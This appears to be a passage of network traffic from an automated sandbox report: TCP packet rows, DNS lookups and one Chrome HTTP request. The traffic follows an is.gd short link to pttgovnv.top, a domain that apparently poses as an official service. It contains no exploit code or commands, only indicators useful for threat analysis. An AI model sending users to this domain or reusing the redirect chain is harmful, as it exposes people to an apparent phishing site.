    Sep 2, 2024 00:28:25.960655928 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.960684061 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.960690975 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.960737944 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.960784912 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.961457014 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.961503983 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.961524010 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.961530924 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.961541891 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.961551905 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.961584091 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.961585045 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.961586952 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.961599112 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.961632013 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.961638927 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.961690903 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.962116003 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.962636948 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.962673903 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.962682962 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.962707043 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.962766886 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.963222980 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.963306904 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.963347912 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.963386059 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.963398933 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.963462114 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.964148998 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.964287043 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.964369059 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.964381933 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.965111017 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.965172052 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.965183973 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.967072964 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.967144012 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.967159986 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.968272924 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.968307972 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.968333006 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.968344927 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.968492031 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.968498945 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.969366074 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.969423056 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.969430923 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.970272064 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.970325947 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.970328093 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.970336914 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.970375061 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.971129894 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.971187115 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.971666098 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.971718073 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.973737001 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.973800898 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.973809958 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.973846912 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.973898888 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.976571083 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.976603985 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.977551937 CEST49774443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.977572918 CEST44349774104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:26.007531881 CEST49775443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:26.007574081 CEST4434977535.190.80.1192.168.2.4
    Sep 2, 2024 00:28:26.007771969 CEST49775443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:26.008014917 CEST49775443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:26.008029938 CEST4434977535.190.80.1192.168.2.4
    Sep 2, 2024 00:28:26.015228987 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:26.015260935 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:26.549381018 CEST4434977535.190.80.1192.168.2.4
    Sep 2, 2024 00:28:26.552040100 CEST49775443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:26.552073002 CEST4434977535.190.80.1192.168.2.4
    Sep 2, 2024 00:28:26.553057909 CEST4434977535.190.80.1192.168.2.4
    Sep 2, 2024 00:28:26.553128958 CEST49775443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:26.554672003 CEST49775443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:26.554727077 CEST4434977535.190.80.1192.168.2.4
    Sep 2, 2024 00:28:26.555088997 CEST49775443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:26.555095911 CEST4434977535.190.80.1192.168.2.4
    Sep 2, 2024 00:28:26.595447063 CEST49775443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:26.675208092 CEST4434977535.190.80.1192.168.2.4
    Sep 2, 2024 00:28:26.675283909 CEST4434977535.190.80.1192.168.2.4
    Sep 2, 2024 00:28:26.675348043 CEST49775443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:26.721963882 CEST49775443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:26.721996069 CEST4434977535.190.80.1192.168.2.4
    Sep 2, 2024 00:28:26.722930908 CEST49776443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:26.722975016 CEST4434977635.190.80.1192.168.2.4
    Sep 2, 2024 00:28:26.723047972 CEST49776443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:26.723666906 CEST49776443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:26.723685026 CEST4434977635.190.80.1192.168.2.4
    Sep 2, 2024 00:28:27.188378096 CEST4434977635.190.80.1192.168.2.4
    Sep 2, 2024 00:28:27.242459059 CEST49776443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:27.385891914 CEST49776443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:27.385915995 CEST4434977635.190.80.1192.168.2.4
    Sep 2, 2024 00:28:27.386532068 CEST4434977635.190.80.1192.168.2.4
    Sep 2, 2024 00:28:27.403354883 CEST49776443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:27.403449059 CEST4434977635.190.80.1192.168.2.4
    Sep 2, 2024 00:28:27.409086943 CEST49776443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:27.452511072 CEST4434977635.190.80.1192.168.2.4
    Sep 2, 2024 00:28:27.677237988 CEST4434977635.190.80.1192.168.2.4
    Sep 2, 2024 00:28:27.677316904 CEST4434977635.190.80.1192.168.2.4
    Sep 2, 2024 00:28:27.677643061 CEST49776443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:27.721215963 CEST49776443192.168.2.435.190.80.1
    Sep 2, 2024 00:28:27.721240997 CEST4434977635.190.80.1192.168.2.4
    Sep 2, 2024 00:28:27.915143013 CEST49672443192.168.2.4173.222.162.32
    Sep 2, 2024 00:28:27.915184975 CEST44349672173.222.162.32192.168.2.4
    Sep 2, 2024 00:28:29.503556967 CEST44349741142.250.185.132192.168.2.4
    Sep 2, 2024 00:28:29.503629923 CEST44349741142.250.185.132192.168.2.4
    Sep 2, 2024 00:28:29.503691912 CEST49741443192.168.2.4142.250.185.132
    Sep 2, 2024 00:28:30.963848114 CEST49741443192.168.2.4142.250.185.132
    Sep 2, 2024 00:28:30.963875055 CEST44349741142.250.185.132192.168.2.4
    Sep 2, 2024 00:28:32.678411007 CEST8049738104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:32.678482056 CEST4973880192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:32.792170048 CEST4973880192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:32.798614979 CEST8049738104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:33.366698027 CEST4972380192.168.2.493.184.221.240
    Sep 2, 2024 00:28:33.377058983 CEST804972393.184.221.240192.168.2.4
    Sep 2, 2024 00:28:33.377113104 CEST4972380192.168.2.493.184.221.240
    Sep 2, 2024 00:29:02.780488968 CEST4973980192.168.2.4104.21.47.250
    Sep 2, 2024 00:29:02.785660028 CEST8049739104.21.47.250192.168.2.4
    Sep 2, 2024 00:29:18.919296026 CEST49785443192.168.2.4142.250.185.132
    Sep 2, 2024 00:29:18.919329882 CEST44349785142.250.185.132192.168.2.4
    Sep 2, 2024 00:29:18.919384003 CEST49785443192.168.2.4142.250.185.132
    Sep 2, 2024 00:29:18.920017004 CEST49785443192.168.2.4142.250.185.132
    Sep 2, 2024 00:29:18.920030117 CEST44349785142.250.185.132192.168.2.4
    Sep 2, 2024 00:29:19.643145084 CEST44349785142.250.185.132192.168.2.4
    Sep 2, 2024 00:29:19.646853924 CEST49785443192.168.2.4142.250.185.132
    Sep 2, 2024 00:29:19.646903992 CEST44349785142.250.185.132192.168.2.4
    Sep 2, 2024 00:29:19.647267103 CEST44349785142.250.185.132192.168.2.4
    Sep 2, 2024 00:29:19.648175955 CEST49785443192.168.2.4142.250.185.132
    Sep 2, 2024 00:29:19.648246050 CEST44349785142.250.185.132192.168.2.4
    Sep 2, 2024 00:29:19.688081980 CEST49785443192.168.2.4142.250.185.132
    Sep 2, 2024 00:29:22.554641962 CEST4972480192.168.2.493.184.221.240
    Sep 2, 2024 00:29:22.559849024 CEST804972493.184.221.240192.168.2.4
    Sep 2, 2024 00:29:22.559907913 CEST4972480192.168.2.493.184.221.240
    Sep 2, 2024 00:29:25.974631071 CEST49786443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:25.974689007 CEST4434978635.190.80.1192.168.2.4
    Sep 2, 2024 00:29:25.974904060 CEST49786443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:25.975708961 CEST49786443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:25.975723982 CEST4434978635.190.80.1192.168.2.4
    Sep 2, 2024 00:29:25.992189884 CEST49787443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:25.992233038 CEST4434978735.190.80.1192.168.2.4
    Sep 2, 2024 00:29:25.992590904 CEST49787443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:25.992825031 CEST49787443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:25.992840052 CEST4434978735.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.422852039 CEST4434978635.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.455543995 CEST4434978735.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.465341091 CEST49787443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.465373993 CEST4434978735.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.465482950 CEST49786443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.465507984 CEST4434978635.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.465956926 CEST4434978635.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.466459990 CEST49786443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.466501951 CEST4434978735.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.466527939 CEST4434978635.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.466566086 CEST49787443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.467010021 CEST49787443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.467086077 CEST4434978735.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.467192888 CEST49786443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.467494965 CEST49787443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.467502117 CEST4434978735.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.508505106 CEST4434978635.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.521061897 CEST49787443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.584161043 CEST4434978635.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.584534883 CEST49786443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.584594011 CEST4434978635.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.584749937 CEST49786443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.586091042 CEST49788443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.586121082 CEST4434978835.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.586366892 CEST49788443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.586754084 CEST49788443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.586765051 CEST4434978835.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.589936972 CEST4434978735.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.590010881 CEST4434978735.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.590172052 CEST49787443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.590195894 CEST4434978735.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.590207100 CEST49787443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.590207100 CEST49787443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.590254068 CEST49787443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.590867996 CEST49789443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.590888023 CEST4434978935.190.80.1192.168.2.4
    Sep 2, 2024 00:29:26.590967894 CEST49789443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.591192007 CEST49789443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:26.591202021 CEST4434978935.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.026209116 CEST4434978935.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.026814938 CEST49789443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:27.026832104 CEST4434978935.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.027209997 CEST4434978935.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.028129101 CEST49789443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:27.028198957 CEST4434978935.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.036520958 CEST49789443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:27.040491104 CEST4434978835.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.040792942 CEST49788443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:27.040818930 CEST4434978835.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.041836023 CEST4434978835.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.041918039 CEST49788443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:27.042622089 CEST49788443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:27.042680979 CEST4434978835.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.043191910 CEST49788443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:27.043200970 CEST4434978835.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.083167076 CEST49788443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:27.084498882 CEST4434978935.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.158770084 CEST4434978935.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.158847094 CEST4434978935.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.158919096 CEST49789443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:27.168049097 CEST4434978835.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.168114901 CEST4434978835.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.168174982 CEST49788443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:27.184037924 CEST49788443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:27.184056997 CEST4434978835.190.80.1192.168.2.4
    Sep 2, 2024 00:29:27.189790010 CEST49789443192.168.2.435.190.80.1
    Sep 2, 2024 00:29:27.189804077 CEST4434978935.190.80.1192.168.2.4
    Sep 2, 2024 00:29:29.556346893 CEST44349785142.250.185.132192.168.2.4
    Sep 2, 2024 00:29:29.556408882 CEST44349785142.250.185.132192.168.2.4
    Sep 2, 2024 00:29:29.556458950 CEST49785443192.168.2.4142.250.185.132
    Sep 2, 2024 00:29:30.760540962 CEST49785443192.168.2.4142.250.185.132
    Sep 2, 2024 00:29:30.760564089 CEST44349785142.250.185.132192.168.2.4
    TimestampSource PortDest PortSource IPDest IP
    Sep 2, 2024 00:28:14.400296926 CEST53599381.1.1.1192.168.2.4
    Sep 2, 2024 00:28:14.407882929 CEST53641701.1.1.1192.168.2.4
    Sep 2, 2024 00:28:15.351705074 CEST53622541.1.1.1192.168.2.4
    Sep 2, 2024 00:28:16.234386921 CEST5406053192.168.2.41.1.1.1
    Sep 2, 2024 00:28:16.234508038 CEST5417553192.168.2.41.1.1.1
    Sep 2, 2024 00:28:16.242814064 CEST53540601.1.1.1192.168.2.4
    Sep 2, 2024 00:28:16.244118929 CEST53541751.1.1.1192.168.2.4
    Sep 2, 2024 00:28:16.253134012 CEST6543653192.168.2.41.1.1.1
    Sep 2, 2024 00:28:16.253274918 CEST5758053192.168.2.41.1.1.1
    Sep 2, 2024 00:28:16.261780024 CEST53654361.1.1.1192.168.2.4
    Sep 2, 2024 00:28:16.262635946 CEST53575801.1.1.1192.168.2.4
    Sep 2, 2024 00:28:16.935244083 CEST5887153192.168.2.41.1.1.1
    Sep 2, 2024 00:28:16.935559034 CEST5121153192.168.2.41.1.1.1
    Sep 2, 2024 00:28:17.116738081 CEST53588711.1.1.1192.168.2.4
    Sep 2, 2024 00:28:17.362304926 CEST53512111.1.1.1192.168.2.4
    Sep 2, 2024 00:28:17.780061960 CEST5241753192.168.2.41.1.1.1
    Sep 2, 2024 00:28:17.783117056 CEST6114253192.168.2.41.1.1.1
    Sep 2, 2024 00:28:18.035182953 CEST53611421.1.1.1192.168.2.4
    Sep 2, 2024 00:28:18.040318012 CEST53524171.1.1.1192.168.2.4
    Sep 2, 2024 00:28:18.674469948 CEST5947153192.168.2.41.1.1.1
    Sep 2, 2024 00:28:18.674670935 CEST6041053192.168.2.41.1.1.1
    Sep 2, 2024 00:28:18.985593081 CEST53604101.1.1.1192.168.2.4
    Sep 2, 2024 00:28:18.985970020 CEST53594711.1.1.1192.168.2.4
    Sep 2, 2024 00:28:22.537940025 CEST5080953192.168.2.41.1.1.1
    Sep 2, 2024 00:28:22.538130999 CEST5941453192.168.2.41.1.1.1
    Sep 2, 2024 00:28:22.708175898 CEST53594141.1.1.1192.168.2.4
    Sep 2, 2024 00:28:23.127774000 CEST53508091.1.1.1192.168.2.4
    Sep 2, 2024 00:28:25.973571062 CEST5373753192.168.2.41.1.1.1
    Sep 2, 2024 00:28:25.974127054 CEST5481053192.168.2.41.1.1.1
    Sep 2, 2024 00:28:25.982445955 CEST53537371.1.1.1192.168.2.4
    Sep 2, 2024 00:28:25.982547045 CEST53548101.1.1.1192.168.2.4
    Sep 2, 2024 00:28:32.672871113 CEST53549471.1.1.1192.168.2.4
    Sep 2, 2024 00:28:34.146070004 CEST138138192.168.2.4192.168.2.255
    Sep 2, 2024 00:28:52.686933041 CEST53633931.1.1.1192.168.2.4
    Sep 2, 2024 00:29:14.017196894 CEST53557581.1.1.1192.168.2.4
    Sep 2, 2024 00:29:15.683000088 CEST53555081.1.1.1192.168.2.4
    Sep 2, 2024 00:29:25.975198030 CEST4942553192.168.2.41.1.1.1
    Sep 2, 2024 00:29:25.975457907 CEST4971153192.168.2.41.1.1.1
    Sep 2, 2024 00:29:25.982296944 CEST53494251.1.1.1192.168.2.4
    Sep 2, 2024 00:29:25.982866049 CEST53497111.1.1.1192.168.2.4
    TimestampSource IPDest IPChecksumCodeType
    Sep 2, 2024 00:28:17.362515926 CEST192.168.2.41.1.1.1c22b(Port unreachable)Destination Unreachable
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Sep 2, 2024 00:28:16.234386921 CEST192.168.2.41.1.1.10x7f42Standard query (0)is.gdA (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:16.234508038 CEST192.168.2.41.1.1.10xc4ecStandard query (0)is.gd65IN (0x0001)false
    Sep 2, 2024 00:28:16.253134012 CEST192.168.2.41.1.1.10x532Standard query (0)is.gdA (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:16.253274918 CEST192.168.2.41.1.1.10xb0ddStandard query (0)is.gd65IN (0x0001)false
    Sep 2, 2024 00:28:16.935244083 CEST192.168.2.41.1.1.10xe7c0Standard query (0)pttgovnv.topA (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:16.935559034 CEST192.168.2.41.1.1.10x3cfaStandard query (0)pttgovnv.top65IN (0x0001)false
    Sep 2, 2024 00:28:17.780061960 CEST192.168.2.41.1.1.10x9e7fStandard query (0)pttgovnv.topA (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:17.783117056 CEST192.168.2.41.1.1.10x950fStandard query (0)pttgovnv.top65IN (0x0001)false
    Sep 2, 2024 00:28:18.674469948 CEST192.168.2.41.1.1.10xfe7bStandard query (0)www.google.comA (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:18.674670935 CEST192.168.2.41.1.1.10xa327Standard query (0)www.google.com65IN (0x0001)false
    Sep 2, 2024 00:28:22.537940025 CEST192.168.2.41.1.1.10xd827Standard query (0)pttgovnv.topA (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:22.538130999 CEST192.168.2.41.1.1.10x5197Standard query (0)pttgovnv.top65IN (0x0001)false
    Sep 2, 2024 00:28:25.973571062 CEST192.168.2.41.1.1.10xfc8bStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:25.974127054 CEST192.168.2.41.1.1.10xfad1Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
    Sep 2, 2024 00:29:25.975198030 CEST192.168.2.41.1.1.10x1c14Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
    Sep 2, 2024 00:29:25.975457907 CEST192.168.2.41.1.1.10xed84Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Sep 2, 2024 00:28:16.242814064 CEST1.1.1.1192.168.2.40x7f42No error (0)is.gd104.25.233.53A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:16.242814064 CEST1.1.1.1192.168.2.40x7f42No error (0)is.gd104.25.234.53A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:16.242814064 CEST1.1.1.1192.168.2.40x7f42No error (0)is.gd172.67.83.132A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:16.244118929 CEST1.1.1.1192.168.2.40xc4ecNo error (0)is.gd65IN (0x0001)false
    Sep 2, 2024 00:28:16.261780024 CEST1.1.1.1192.168.2.40x532No error (0)is.gd172.67.83.132A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:16.261780024 CEST1.1.1.1192.168.2.40x532No error (0)is.gd104.25.234.53A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:16.261780024 CEST1.1.1.1192.168.2.40x532No error (0)is.gd104.25.233.53A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:16.262635946 CEST1.1.1.1192.168.2.40xb0ddNo error (0)is.gd65IN (0x0001)false
    Sep 2, 2024 00:28:17.116738081 CEST1.1.1.1192.168.2.40xe7c0No error (0)pttgovnv.top104.21.47.250A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:17.116738081 CEST1.1.1.1192.168.2.40xe7c0No error (0)pttgovnv.top172.67.174.217A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:17.362304926 CEST1.1.1.1192.168.2.40x3cfaNo error (0)pttgovnv.top65IN (0x0001)false
    Sep 2, 2024 00:28:18.035182953 CEST1.1.1.1192.168.2.40x950fNo error (0)pttgovnv.top65IN (0x0001)false
    Sep 2, 2024 00:28:18.040318012 CEST1.1.1.1192.168.2.40x9e7fNo error (0)pttgovnv.top104.21.47.250A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:18.040318012 CEST1.1.1.1192.168.2.40x9e7fNo error (0)pttgovnv.top172.67.174.217A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:18.985593081 CEST1.1.1.1192.168.2.40xa327No error (0)www.google.com65IN (0x0001)false
    Sep 2, 2024 00:28:18.985970020 CEST1.1.1.1192.168.2.40xfe7bNo error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:22.708175898 CEST1.1.1.1192.168.2.40x5197No error (0)pttgovnv.top65IN (0x0001)false
    Sep 2, 2024 00:28:23.127774000 CEST1.1.1.1192.168.2.40xd827No error (0)pttgovnv.top104.21.47.250A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:23.127774000 CEST1.1.1.1192.168.2.40xd827No error (0)pttgovnv.top172.67.174.217A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:25.982445955 CEST1.1.1.1192.168.2.40xfc8bNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:29.555419922 CEST1.1.1.1192.168.2.40xfd65No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:29.555419922 CEST1.1.1.1192.168.2.40xfd65No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:30.070538998 CEST1.1.1.1192.168.2.40xcbe1No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
    Sep 2, 2024 00:28:30.070538998 CEST1.1.1.1192.168.2.40xcbe1No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
    Sep 2, 2024 00:28:43.806866884 CEST1.1.1.1192.168.2.40xe193No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
    Sep 2, 2024 00:28:43.806866884 CEST1.1.1.1192.168.2.40xe193No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
    Sep 2, 2024 00:29:08.021687031 CEST1.1.1.1192.168.2.40xfd43No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
    Sep 2, 2024 00:29:08.021687031 CEST1.1.1.1192.168.2.40xfd43No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
    Sep 2, 2024 00:29:25.982296944 CEST1.1.1.1192.168.2.40x1c14No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
    Sep 2, 2024 00:29:26.995517015 CEST1.1.1.1192.168.2.40xfef8No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
    Sep 2, 2024 00:29:26.995517015 CEST1.1.1.1192.168.2.40xfef8No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
    • is.gd
    • pttgovnv.top
    • https:
    • fs.microsoft.com
    • a.nel.cloudflare.com
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.449739104.21.47.25080928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    Sep 2, 2024 00:28:17.487498999 CEST431OUTGET /help HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
